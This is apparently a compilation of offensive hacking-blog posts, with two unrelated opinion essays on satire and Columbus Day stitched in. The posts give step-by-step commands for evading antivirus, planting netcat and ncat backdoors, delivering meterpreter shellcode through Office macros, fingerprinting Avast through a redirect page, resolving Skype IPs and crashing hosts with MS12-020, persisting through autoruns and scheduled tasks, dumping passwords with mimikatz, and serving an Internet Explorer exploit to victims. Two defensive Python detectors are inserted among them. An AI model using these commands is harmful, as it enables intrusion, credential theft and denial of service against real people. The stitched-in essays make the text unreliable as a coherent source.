List of Different AV Evasion Frameworks.

Today we are going to talk about different AV evasion frameworks for Metasploit payloads and how to use them. It is very important to know which AV you have to bypass, because then you do not have to worry about a fully undetectable (FUD) payload: a payload may bypass one specific AV while another AV cannot be bypassed using the same payload.

(1)Veil:-


Veil is a Python-based tool that creates FUD payloads and is one of the best frameworks for AV evasion. On the 15th of every month, at least one new payload module is released.

Click here for how to install and use Veil.

(2)AV0id :-


Anti-Virus Bypass Metasploit Payload Generator Script.

wget https://github.com/nccgroup/metasploitavevasion/archive/master.zip
unzip master.zip
cd metasploitavevasion-master/
./avoid.sh



If you are using an interface other than eth, you have to change it in the avoid.sh script. For example, I am using the ppp0 interface, so I open avoid.sh and replace line 150, which is IP=$(ifconfig "$IPINT" |grep "inet adr:" |cut -d ":" -f 2 |awk '{ print $1 }'), with IP=$(ifconfig ppp0 | awk '/inet addr/ {split ($2,A,":"); print A[2]}').



Click here for the original author's blog.

(3)Syringe:-


wget https://syringe-antivirus-bypass.googlecode.com/files/syringe%200.1.tar
tar xf syringe\ 0.1.tar
./syringe.sh


As mentioned previously, change the interface in the script if you are not using eth: replace line 10, which is export interface=eth0, with export interface=ppp0.


(4)Shellcodeexec:-


git clone https://github.com/inquisb/shellcodeexec

We are going to use the downloaded shellcodeexec in the third step on the victim machine.

(1)msfpayload windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.56.1 R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX

(2)msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.56.1 E

(3)C:\WINDOWS\Temp>shellcodeexec.exe <msfencode's alphanumeric-encoded payload>


Click here for a detailed tutorial on how to use shellcodeexec.

(5)Hyperion:-


Hyperion is a runtime encrypter for 32-bit portable executables.

wget http://nullsecurity.net/tools/binary/Hyperion-1.0.zip
unzip Hyperion-1.0.zip
cd Hyperion-1.0
wine /root/.wine/drive_c/MinGW/bin/g++.exe ./Src/Crypter/*.cpp -o crypter.exe

Now generate metasploit payload.


msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.128 LPORT=443 -f exe >payload.exe
wine crypter.exe payload.exe encrypted_payload.exe


(6)Crypter.py:-


Download it from the link below.
http://home.base.be/%72%68%69%6e%63%6b%78%74/script.zip
unzip  script.zip
python crypter.py


If you get an error while running it, change the path of structure.c on line 45, save the file, and run it again.


(7)Brute-force AV Evasion :-


GenPayloads.py is a script that generates a large number of payloads; you then scan the folder with the specific AV, and afterwards you are left with the binaries in the folder that are not detected by that AV.

Click here for the original tutorial.

wget https://raw.github.com/obscuresec/random/master/GenPayloads.py
python GenPayloads.py windows/meterpreter/reverse_tcp 192.168.1.2 443 1000 yes

(8)Finding Simple AV Signatures with PowerShell :-


An awesome tutorial here shows how to find AV signatures and then change the specific bytes that trigger the AV. It only works against signature-based antivirus.

(9)Powershell:-


Bypass AV using the SET PowerShell module via a batch file

Get a shell using PowerSploit

Deliver a PowerShell payload using a macro

(10)Get Shell Using VB script:-


Metasploit has a couple of built in methods you can use to infect Word and Excel documents with malicious Metasploit payloads. You can also use your own custom payloads as well.

For a detailed tutorial, click here.

(11)Ghost Writing ASM :-


Using Metasm to avoid antivirus detection: first generate the Metasploit payload in raw format, then disassemble it using Metasm, which comes with Metasploit. Add anything you want, so long as you don't break the functionality of the application. After that, compile it into an EXE.

For the tutorial, click here.

(12)Different Pivoting technique to bypass AV :-


The following are frameworks and modules that are mostly used after getting credentials. They are not flagged by AV the way the traditional psexec is.

(1)Veil-Catapult

(2)SMBExec

(3)Keimpx

(4)PTH suite

(5)Metasploit modules:- powershell_psexec, psexec_psh, psexec_command

If you know other methods for AV evasion, please comment here.


Backdoor using Netcat, Cryptcat, Ncat.

Today we are going to talk about Netcat and its alternatives; I assume that all of you are familiar with Netcat. If not, read here. I also assume that you have already opened port 455 using the following command.

netsh firewall add portopening TCP 455 "Service Firewall" ENABLE ALL

Attacker's IP: 192.168.56.1

Victim's IP: 192.168.56.101

We will talk about Netcat, Cryptcat and Ncat.

(A)Netcat:-


Netcat is used as a backdoor. After gaining access to the machine, we create netcat as a startup service by making changes to the system registry, and then we open a port for communication. On the attacker side, just start a netcat listener. Here is a tutorial on how to create a netcat backdoor.

But if you know the method used in that tutorial, there are some disadvantages of using netcat.

(1)Most AVs flag netcat as a hacking tool:- I know you can use a crypter, but general behaviour-based detection by AV is still possible.



(2)Clear-text communication (no encryption):- anyone on the same network can view your communication. Also, because the communication is in clear text, a firewall or AV can pop up and block it.


(3)No authentication:- anyone can start a listener to connect back to our backdoor, because there is no mechanism to verify whether the user is authorised or not.


(B)Cryptcat:-


Cryptcat is the same as netcat but, in addition, it provides encryption and an authentication mechanism.

How to install cryptcat?


On BackTrack: apt-get install cryptcat.

If you are on another Linux OS, you have to install it manually from source, because the repository build does not come with the -e option, so we cannot bind any program to it.

So download source from here .

Unzip it, change into the directory and enter the following command

make unix

To make an exe (Windows compatible) from source, use Visual Studio.

root@bt:~# cryptcat -h
[v1.10]
connect to somewhere:    nc [-options] hostname port[s] [ports] ...
listen for inbound:            nc -l -p port [-options] [hostname] [port]
options:
    -e prog            program to exec after connect [dangerous!!]
    -g gateway      source-routing hop point[s], up to 8
    -G num            source-routing pointer: 4, 8, 12, ...
    -h                     this cruft
    -k secret          set the shared secret
    -i secs              delay interval for lines sent, ports scanned
    -l                      listen mode, for inbound connects
    -n                     numeric-only IP addresses, no DNS
    -o file               hex dump of traffic
    -p port             local port number
    -r                     randomize local and remote ports
    -s addr             local source address
    -u                     UDP mode
    -v                     verbose [use twice to be more verbose]
    -w secs            timeout for connects and final net reads
    -z                     zero-I/O mode [used for scanning]

Most of the options are the same as netcat, but look at the new option -k, which provides a password for the communication.

On the victim machine, type the following command

cryptcat -Ldp 455 -e cmd.exe

On the attacker side, set up the listener

cryptcat 192.168.56.101 455


Look at the following figure, where we capture the traffic using Wireshark; it is encrypted.


You can also provide the -k option for authentication. So in the case of cryptcat we get authentication and encryption.

But it is still detected by AV.


(C)Ncat:-


Ncat was written for the Nmap Project as a much-improved reimplementation of the venerable Netcat. Ncat comes with nmap, so on the attacker side we already have ncat installed.

To download ncat for Windows, click here.

View the ncat man page or run ncat --help; it has many options.

For encryption and authentication you can use --ssl, --ssl-cert, --ssl-key and --ssl-verify.

On the victim side:-

ncat -lvp 455 --ssl -e cmd.exe --allow 192.168.56.1

I encrypt the communication using SSL and only allow the IP 192.168.56.1 to connect back. It is still possible to connect back by spoofing the IP.

On the attacker side

ncat 192.168.56.101 455 --ssl


And it is not detected by AV.




So with the help of ncat, we can get around our problems: no authentication, no encryption, and being caught by AV.

Give Piss-Taking A Chance



It’s 45 years since John and Yoko suggested that we “Give Peace a Chance”. A laudable suggestion and a very handy sound bite for the budding Beauty Queen.

For many however such commendable desires for world peace are often tempered with their own indoctrinated ideologies. Many falsely believe the path to peace and harmony lies exclusively within their own particular faith. Increasingly we seem to be witnessing examples where those ideologies appear to be so entrenched and perverted that those captivated under their spell abandon reason and humanity in violent and bloody pursuit of their own deluded notions of Nirvana.

Imagine if John was still with us today, it’s easy if you try. The rolling news coverage on any given day may well lead him to conclude that his admirable 1968 proposal is not going as well as he had hoped. We tried staying in bed. We tried painting our naked bodies in psychedelic patterns and flouncing around to Jefferson Airplane whilst shoving flowers down the barrels of rifles, but it didn’t really work. More recently we tried retaliating against terror with well financed “Shock and Awe”. But that didn't seem to work out too well either.

Now what?  Are we all out of ideas? Do we just cower behind our enhanced airport security and knee jerk anti-terrorism policies and wait for it to go away? Do we redefine our goals for peace to be a little more localised?

I think not. I think we’ve just been retaliating with the wrong weapons. I propose a fresh assault on terror. Not with guns and bombs but with satire, sarcasm and ridicule.

Let’s rip their ideology apart with cutting satirical warfare; let’s rain down cogent and piercing ridicule on their fragile dogmas. Let us unleash the weapons of mass derision. Put down your swords, pick up your pens and let’s make the fundamentalists of all faiths into morons rather than martyrs. And let’s indiscriminately deploy the same sardonic sortie on our own more familiar ideological claptrap.


NB: Extracting urine from deeply held yet completely ridiculous ideologies does not contravene your diversity training

Get shell Using Shellcode in Macro.

We can execute shellcode directly in a macro. It is a very old method, but still useful, because AV does not trigger on it. First we will generate the VBA code of our payload.

msfconsole
use payload/windows/meterpreter/reverse_tcp
set LHOST 192.168.56.102
set LPORT 443
generate -t vba
exploit


Now we have generated our shellcode. Next we will create the macro.

(1)Open any Word or Excel document

(2)Click on View and then click on Macros.

(3)Give the macro a name and create it.


(4)Remove everything from the module window and paste our generated VB code.



(5)Save it as type Word Macro-Enabled Document.


Send this file to the victim. By default in MS Office the "Disable all macros with notification" option is enabled, so whenever a document tries to execute a macro it pops up a security warning that macros are disabled; to execute our shellcode via the macro, the victim has to click on Enable Content.

You have to set up a listener to receive the reverse connection. If your IP is not reachable when the victim opens the document, the document will crash. So now we will set up the listener

use exploit/multi/handler
set lhost 192.168.56.102
set lport 443
set payload windows/meterpreter/reverse_tcp
set autorunscript migrate -n explorer.exe
exploit

Here we set the migrate script as autorunscript, so when the document is closed our shell will not die.

How to detect Avast Antivirus remotely?

During an assessment, if you know which antivirus the client uses, you have won half the battle, because you can download a trial version of that AV, install it in VirtualBox and try to bypass it, so that during the real assessment your payload or binary does not get caught. Today we are going to try to detect whether the client has Avast installed.

The original video is posted here. Avast has a site-blocking feature: if you want to block any site, you can put its address in the Block URL section of the Avast interface. When someone loads that site they get the response shown in the image below.


In the above image you can see the Avast logo, whose address is localhost:12080/$$avast-webshield$$/image001.png. So if Avast is installed on the client machine, that image is also located at that address; by examining whether the image exists or not, we can tell whether Avast is installed.

For this purpose the victim has to visit our link, where we check for the image. I am going to use my Apache server, where I put three HTML pages. One is the link we send to the victim; if the image exists it redirects to a second page, and if the image does not exist it redirects to a third page.

(1)Make a blank HTML page, name it avst.html and put the following code in it.

<meta http-equiv="refresh" content="0; url=http://google.com/">

(2)Now make a second HTML page, name it ntavst.html and put the same code in it.

<meta http-equiv="refresh" content="0; url=http://google.com/">

(3)Make the third and final HTML page, name it exp.html and put in the following code.

<div dir="ltr" style="text-align: left;" trbidi="on">
<img src="http://127.0.0.1:12080/$$avast-webshield$$/image001.png" onload="document.location='http://180.215.198.150/avst.html'" onerror="document.location='http://180.215.198.150/ntavst.html'" />
</div>

Note:- Change the IP in the above code to your own.

Now put all these documents in the /var/www/ folder and send the link to exp.html to the victim.

So if Avast is installed, it redirects to the avst.html page and finally to google.com; if it is not installed, it redirects to the ntavst.html page and then to google.com.

Now check your Apache access log under /var/log/apache2/; there you can see whether avst.html or ntavst.html was visited.
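From the defender's side, the same probe can be spotted in page content: a resource URL pointing at a loopback address on an unusual port, paired with onload/onerror handlers that navigate somewhere. The following Python checker is an added example, not part of the original post; the sample HTML is constructed and ATTACKER-IP-PLACEHOLDER stands in for the redirect host.

```python
from dataclasses import dataclass
from html.parser import HTMLParser
from typing import List, Optional, Tuple
from urllib.parse import urlparse

# Constructed sample page: one benign image and one loopback probe of the kind
# described above (ATTACKER-IP-PLACEHOLDER stands in for the redirect host).
SAMPLE_HTML = """<html><body>
<img src="https://example.com/logo.png" alt="benign">
<img src="http://127.0.0.1:12080/$$avast-webshield$$/image001.png"
     onload="document.location='http://ATTACKER-IP-PLACEHOLDER/avst.html'"
     onerror="document.location='http://ATTACKER-IP-PLACEHOLDER/ntavst.html'" />
</body></html>"""

# Elements that fetch a URL and fire load/error events, so they can act as probes.
PROBE_TAGS = {"img", "script", "iframe", "link", "audio", "video"}
LOOPBACK_HOSTS = {"localhost", "::1"}
LOAD_EVENTS = ("onload", "onerror")


@dataclass
class LocalProbe:
    tag: str
    url: str
    port: Optional[int]
    handlers: Tuple[str, ...]  # load/error handlers present on the element, sorted


def is_loopback(host: str) -> bool:
    """True for localhost, ::1 and any 127.0.0.0/8 address."""
    host = host.lower()
    return host in LOOPBACK_HOSTS or host.startswith("127.")


class LocalProbeFinder(HTMLParser):
    """Collect resource elements whose URL points at the local machine."""

    def __init__(self) -> None:
        super().__init__()
        self.probes: List[LocalProbe] = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lower-cases tag and attribute names for us.
        if tag not in PROBE_TAGS:
            return
        attr_map = {name: value or "" for name, value in attrs}
        url = attr_map.get("src") or attr_map.get("href")
        if not url:
            return
        parsed = urlparse(url)
        if not is_loopback(parsed.hostname or ""):
            return
        try:
            port = parsed.port  # raises ValueError on a malformed port
        except ValueError:
            port = None
        handlers = tuple(sorted(name for name in attr_map if name in LOAD_EVENTS))
        self.probes.append(LocalProbe(tag, url, port, handlers))


def find_local_probes(html: str) -> List[LocalProbe]:
    """Every element that loads something from a loopback address."""
    finder = LocalProbeFinder()
    finder.feed(html)
    finder.close()
    return finder.probes


def suspicious_probes(html: str) -> List[LocalProbe]:
    """Loopback fetches that also react to load/error are the fingerprinting pattern."""
    return [probe for probe in find_local_probes(html) if probe.handlers]


if __name__ == "__main__":
    for probe in suspicious_probes(SAMPLE_HTML):
        print(f"<{probe.tag}> probes {probe.url} (port {probe.port}) "
              f"via {', '.join(probe.handlers)}")
```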

PS: You can use Cobalt Strike's System Profiler, which gets you the OS version, browser details, Java version, Adobe Reader version and Flash version.

Taking the Chris out of Columbus Day

Jonathan Twingley/The Los Angeles Times
Perhaps I am naive, but I assume that serious debates about the merits of Columbus Day have been settled.

I hear no firsthand defenses of the holiday.  I hear no one seriously defend him as a person or praise his "discovery" of the Americas as anything other than a kind of accident that was fortunate for him and unfortunate for millions of others.  So I do not give him or his holiday much attention.

But then, since I teach American Indian literatures at a university, I am not surrounded by people prone to defend him. On my campus, people are more likely to talk about the door he opened for the importation of commercialized slavery, apocalyptic diseases, and conquistadors than about anything positive he may have been credited for in the past.

The Los Angeles Times, though, ran a defense of sorts for the holiday in Sunday's edition. The op-ed  piece by an emeritus professor from UCLA, "Curiosity set sail with Columbus," attempts to credit his journey with "prying loose European curiosity from the vise put in place by the medieval church."

The claim strikes me as ironic since so much of the ensuing colonization of the Americas was enabled and empowered by the Catholic Church, including the enslavement of Indians.

Although the article mentions the "unintentional holocaust" caused by diseases that crossed the ocean with the Europeans, it does not mention the intentional holocausts of mass slavery, imperialism, and genocidal warfare.

In fact, the newspaper itself may have been a little ambivalent about the retired professor's opinion. The op-ed is accompanied by an illustration that conveys a message (intentional or not) that undermines the words.

Granted, the image shows Columbus on top of the world and a generic church figure on the bottom; this suggests that he has perhaps upended some balance of power in the world.  But Columbus has a really creepy hand holding his stomach; it looks rather skeletal.  And his face is strangely obscured along his jaw and neck, with odd markings in the air by his face and shoulder -- are they insects?  I do not know what the artist intended, but to me Columbus looks a bit like the Lord of the Flies.

Rather than representing the Light of Knowledge, he looks like the Specter of Death. The op-ed suggests he was some kind of vanguard of the Enlightenment, but the illustration suggests he was a harbinger of Doom.

The church official below him looks somewhat skeletal himself, and his red robe suggests something hellish as much as holy.  Rather than looking like opposites, the two figures look like partners in crime.

I have no problem if the retired UCLA professor wants a new holiday to celebrate Europe's emergence from some intellectual black hole.  Let's just not call it Columbus Day.

Fun with skype resolver

Skype resolvers are used by hackers to get Skype users' IP addresses; when a hacker gets a user's IP address, they usually hit them offline or DDoS them.

If your victim is in your friend list and you are using Linux, it is very simple to get their IP.

netstat -tupan | grep skype > n1

Now chat with your victim; as soon as you get a reply, use the following command.

netstat -tupan | grep skype > n2

diff n1 n2

Now we have the victim's IP.

In most situations our victim is not in our friend list. For that situation we will use an online Skype resolver. You can also use the bash script I wrote to get the victim's IP.

root@bt:~# git clone https://github.com/niravkdesai/skypersolver.sh

root@bt:~# cd skypersolver.sh/

root@bt:~/skypersolver.sh# sh skypersolver.sh


Use one of the following links to get the IP of your victim from their Skype user name.

(1)http://www.skyperesolver.com/

(2)http://skresolver.com/

(3)http://www.speedresolve.com/resolve.php

(4)http://skypegrab.com/skype-beta

(5)http://iskyperesolve.com/

Okay, we got the IP. Now you could directly DoS or DDoS them (DDoS and DoS attacks are illegal), but we are going to use a different technique to shut down the victim's PC using RDP.

First scan the IP to find the victim's open ports.

root@bt:~# nmap 192.168.56.101

Starting Nmap 6.40 ( http://nmap.org ) at 2013-10-11 18:41 IST
Nmap scan report for 192.168.56.101
Host is up (0.00077s latency).
Not shown: 995 filtered ports
PORT      STATE  SERVICE
139/tcp     open   netbios-ssn
445/tcp     open   microsoft-ds
2869/tcp   closed icslap
3389/tcp   open   ms-wbt-server
10243/tcp closed unknown
MAC Address: 08:00:27:B3:A3:80 (Cadmus Computer Systems)


From the result we can see that port 3389 is open, which is used for RDP.

Now we will use the Metasploit auxiliary module to check for the vulnerability.

msf > use auxiliary/scanner/rdp/ms12_020_check
msf auxiliary(ms12_020_check) > set RHOSTS 192.168.56.101
RHOSTS => 192.168.56.101
msf auxiliary(ms12_020_check) > run

[+] 192.168.56.101:3389 Vulnerable to MS12-020
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed


Okay, we found that the host is vulnerable to MS12-020. Now we will use the Metasploit module to DoS that IP.

msf auxiliary(ms12_020_check) > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
msf auxiliary(ms12_020_maxchannelids) > set RHOST 192.168.56.101
RHOST => 192.168.56.101
msf auxiliary(ms12_020_maxchannelids) > run

[*] 192.168.56.101:3389 - Sending MS12-020 Microsoft Remote Desktop Use-After-Free DoS
[*] 192.168.56.101:3389 - 210 bytes sent
[*] 192.168.56.101:3389 - Checking RDP status...
[+] 192.168.56.101:3389 seems down
[*] Auxiliary module execution completed


And bingo; your victim's machine should restart. :)

Get shell using Missing Autoruns.

In the previous post we saw how we can execute a scheduled task after compromising a PC. Today we will see another method of maintaining access to a compromised PC.

(A)When we install a program in a Windows environment, some of them ask to run at startup. These programs write a value to the Windows registry, and whenever the PC is restarted the program runs in the background. When a program's uninstallation is not completed, it fails to remove its value from the registry. This is called a missing autorun.

After compromising the PC, we have to find missing autoruns on the victim machine. For this purpose we will use Sysinternals' autorunsc.exe.

(1)Get meterpreter shell.

(2)Upload Sysinternals' autoruns.exe and autorunsc.exe to the victim machine.

(3)Now, from the upload directory, execute the following command to get the missing autoruns of the machine

autorunsc.exe -a | findstr /n /R "File\ not\ found"

(4)Now we have the list of files which are missing; these files are run at startup.



(5)In my case you can see that uTorrent.exe is missing.

(6)So now I rename my backdoor to uTorrent.exe and upload it to the path where it was not found.


Now whenever the machine is restarted you get a shell. (Don't forget to run multi/handler!!!)

Just as a POC, you can run autorunsc.exe again to find out whether our backdoor (uTorrent.exe) has been written successfully.


In the above image you can see that uTorrent.exe is no longer missing, whereas it was missing in the previous step.
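Seen from the defender's side, the same autorunsc output is an audit list: a dangling entry is one to delete before anything can be planted at its path, and an unsigned binary sitting in a user-writable location such as the Startup folder (method B below) is the other thing to review. This Python audit is an added example, not the post's code; the column layout assumed for an "autorunsc -a * -c -v" CSV export is an assumption, and the sample rows are constructed.

```python
import csv
import io
import re
from dataclasses import dataclass
from typing import Dict, List

# Constructed sample of an Autoruns CSV export (assumed layout of
# "autorunsc -a * -c -v"; check the header row against your Autoruns version).
SAMPLE_CSV = (
    "Entry Location,Entry,Enabled,Description,Publisher,Image Path,Launch String\n"
    "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run,uTorrent,enabled,,,"
    "File not found: C:\\Users\\nirav\\AppData\\Roaming\\uTorrent\\uTorrent.exe,"
    "\"C:\\Users\\nirav\\AppData\\Roaming\\uTorrent\\uTorrent.exe /MINIMIZED\"\n"
    "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run,VBoxTray,enabled,"
    "VirtualBox Guest Additions Tray Application,(Verified) Oracle Corporation,"
    "c:\\windows\\system32\\vboxtray.exe,C:\\Windows\\system32\\VBoxTray.exe\n"
    "C:\\Users\\nirav\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup,"
    "backdoor.exe,enabled,,,"
    "c:\\users\\nirav\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\backdoor.exe,"
    "c:\\users\\nirav\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\backdoor.exe\n"
)

# Autoruns reports a dangling entry as "File not found: <path>" in the Image Path column.
MISSING_RE = re.compile(r"^file not found(?::\s*(?P<path>.*))?$", re.IGNORECASE)

# Path fragments that an unprivileged user can normally write to.
USER_WRITABLE_MARKERS = ("\\appdata\\", "\\temp\\", "\\users\\public\\",
                         "\\programdata\\", "\\downloads\\")

DANGLING = "dangling"
UNVERIFIED_USER_WRITABLE = "unverified-user-writable"


@dataclass
class Finding:
    location: str
    entry: str
    image_path: str
    reason: str


def parse_autoruns_csv(text: str) -> List[Dict[str, str]]:
    """Parse an already-decoded Autoruns CSV export into one dict per entry."""
    return list(csv.DictReader(io.StringIO(text)))


def audit_autoruns(rows: List[Dict[str, str]]) -> List[Finding]:
    """Flag entries that are either dangling or unverified in a user-writable path."""
    findings: List[Finding] = []
    for row in rows:
        image = (row.get("Image Path") or "").strip()
        publisher = (row.get("Publisher") or "").strip()
        missing = MISSING_RE.match(image)
        if missing:
            # Nothing is on disk, so whatever is dropped at this path runs at boot:
            # the entry should be removed rather than left waiting to be filled.
            target = missing.group("path") or row.get("Launch String", "")
            findings.append(Finding(row["Entry Location"], row["Entry"], target, DANGLING))
            continue
        in_user_path = any(marker in image.lower() for marker in USER_WRITABLE_MARKERS)
        # With -v, Autoruns prefixes a good signature with "(Verified)"; anything else
        # in a user-writable location deserves a look (assumed column convention).
        if in_user_path and not publisher.startswith("(Verified)"):
            findings.append(Finding(row["Entry Location"], row["Entry"], image,
                                    UNVERIFIED_USER_WRITABLE))
    return findings


if __name__ == "__main__":
    for finding in audit_autoruns(parse_autoruns_csv(SAMPLE_CSV)):
        print(f"[{finding.reason}] {finding.entry} @ {finding.location} -> {finding.image_path}")
```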

(B)This is the second method, but it may be suspicious.

When you put a binary in the Startup folder, it runs automatically when the PC is started.

Startup folder location in Windows XP:-

C:\Documents and Settings\"nirav"\Start Menu\Programs\Startup

Startup folder location in Windows 7:-

C:\Users\username\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

So upload your binary to the Startup folder and make it hidden using the following command.
attrib +h backdoor.exe
Restart the machine and hopefully you will get a shell.

Scheduled Task in Windows after Exploitation.

Recently at DerbyCon, mubix and carnal0wnage presented "Windows Attacks: AT is the new black". It is a really great presentation; you can find it here. So I will put their method here.

After getting a meterpreter shell, we have to maintain access. You can use the meterpreter backdoor and persistent backdoor, but most of the time they will be caught by AV. You can create a FUD payload using Veil. We can also create a scheduled task for our backdoor.

First create a batch file and put the following code in it

@echo off
"C:\Documents and Settings\nirav\Desktop\backdoor.exe"


Then upload your backdoor and the batch file you created. Please adjust the path in the batch file according to the upload path of your backdoor.

Get clear-text passwords:-

The following are different methods to get clear-text Windows passwords.

(1)Use mimikatz or WCE to get the victim's clear-text password.

(2)You can also use the mimikatz password dump method.

(3)You can also use the mimikatz meterpreter plugin, which I used in this tutorial.

   meterpreter > load mimikatz
   meterpreter > help mimikatz
   meterpreter > kerberos
   meterpreter > mimikatz_command -h
   meterpreter > mimikatz_command -f sekurlsa::logonPasswords -a "full"

(4)You can use WCE and mimikatz in memory without uploading the binary.

(a)WCE in memory:-

cd %systemroot%
cd system32
pwd
execute -H -m -d calc.exe -f /root/wce.exe -a "-o foo.txt"
cat foo.txt

(b)Mimikatz in memory:-

cd %systemroot%
cd system32
execute -H -i -c -m -d calc.exe -f /root/mimi/Win32/mimikatz.exe -a '"sekurlsa::logonPasswords full" exit'

So far I have uploaded one batch file and the backdoor, and obtained the clear-text password.

Now we are going to schedule our backdoor using the schtasks command. For detailed options of schtasks, visit here. In this tutorial I schedule my backdoor daily at 22:16, so every day at 22:16 my backdoor will be executed and I will get a shell.

C:\Documents and Settings\nirav> SchTasks /Create /SC DAILY /TN Evil2 /TR "\"C:\Documents and Settings\nirav\Desktop\sch.bat\"" /ST 22:16:00

It will ask you to enter the password, which we obtained before.


You can also use different schedule options like ONIDLE, ONLOGON and ONSTART, and execute different binaries according to your needs.

Exploit for all IE versions (CVE-2013-3893).

Recently the public has shown a lot of interest in the new Internet Explorer vulnerability (CVE-2013-3893) that has been exploited in the wild, which was initially discovered in Japan. At the time of this writing there is still no patch available, but there is still at least a temporary fix-it that you can apply from Microsoft, which can be downloaded here.

This module exploits a use-after-free vulnerability that currently targets Internet Explorer 9 on Windows 7, but the flaw should exist in versions 6/7/8/9/10/11. It was initially found in the wild in Japan, but other regions such as English, Chinese, Korean, etc., were targeted as well.

For more technical detail, see the Metasploit blog here.

The Metasploit module can currently only be tested on Internet Explorer 9 on Windows 7 SP1 with either Office 2007 or Office 2010 installed.


msf > use exploit/windows/browser/ie_setmousecapture_uaf
msf exploit(ie_setmousecapture_uaf) > set srvhost 192.168.56.1
srvhost => 192.168.56.1
msf exploit(ie_setmousecapture_uaf) > set uripath /
uripath => /
msf exploit(ie_setmousecapture_uaf) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ie_setmousecapture_uaf) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf exploit(ie_setmousecapture_uaf) > set lport 443
lport => 443
msf exploit(ie_setmousecapture_uaf) > run
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.56.1:443
[*] Using URL: http://192.168.56.1:8080/
[*] Server started.


Send this link to the victim. As soon as they open the link you will get a meterpreter shell.
